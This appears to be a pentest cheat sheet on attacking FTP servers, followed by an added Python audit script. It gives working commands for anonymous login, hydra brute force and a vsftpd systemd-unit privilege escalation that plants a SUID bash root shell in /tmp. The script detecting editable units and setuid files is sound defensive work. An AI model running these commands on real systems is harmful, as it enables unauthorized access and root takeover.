FTP

Anonymous Login

Some installations of FTP will allow anonymous logins.

ftp <victim_ip> 
anonymous:anonymous

Brute Force

If the server enforces no maximum number of login attempts or any similar system, the login can simply be brute forced.

hydra -l admin -P wordlist.txt <victim_ip> -t 64 ftp

Privilege Escalation - VSFTPD

If you can edit the vsftpd service file, you can get a root shell.

Modify the service file to run the following commands:

cp /bin/bash /tmp/root_shell
chmod +xs /tmp/root_shell

These commands copy /bin/bash to /tmp/root_shell and set the SUID bit on the copy, which allows us to execute the binary as its owner, i.e. root.

Edit the /lib/systemd/system/vsftpd.service file to contain the following code:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/root_shell; chmod +xs /tmp/root_shell'
#ExecReload=/bin/kill -HUP $MAINPID
#ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

Once the vsftpd.service file is modified, reload the daemon:

systemctl daemon-reload

This allows us to run our modified service using:

sudo /usr/sbin/service vsftpd restart

A new file, root_shell, should now be available inside the /tmp directory.

Use this file to spawn a root shell:

/tmp/root_shell -p
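
The technique above depends on two conditions a defender can audit for: a unit file that someone other than root can edit, and a setuid binary appearing in a temp directory. The script below is an added example, not part of the original page; the function names risky_units and setuid_files, the trusted_uids parameter and the extra /etc/systemd/system path are assumptions made for illustration.

```python
import os
import stat
import tempfile

def risky_units(unit_dir, trusted_uids=(0,)):
    """Return {unit_name: [reasons]} for .service files a non-trusted user could edit."""
    findings = {}
    for name in sorted(os.listdir(unit_dir)):
        path = os.path.join(unit_dir, name)
        if not name.endswith(".service") or not os.path.isfile(path):
            continue  # skips directories, masked units and broken symlinks
        st = os.stat(path)  # follows symlinks: the target is what systemd loads
        reasons = []
        if st.st_uid not in trusted_uids:
            reasons.append(f"owned by uid {st.st_uid}")
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if reasons:
            findings[name] = reasons
    return findings

def setuid_files(directory):
    """Return regular files under directory that carry the setuid or setgid bit."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            st = os.lstat(path)  # do not follow symlinks out of the directory
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)

if __name__ == "__main__":
    # /lib/systemd/system is the path used on this page; /etc/systemd/system
    # is the standard location for local overrides (added here as an assumption).
    for d in ("/lib/systemd/system", "/etc/systemd/system"):
        if os.path.isdir(d):
            for unit, why in risky_units(d).items():
                print(f"{d}/{unit}: {', '.join(why)}")
    for hit in setuid_files(tempfile.gettempdir()):
        print(f"setuid/setgid file in temp dir: {hit}")
```

Any unit it reports should be reset to root ownership with mode 644, and any setuid file it finds under /tmp should be treated as a sign of compromise.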
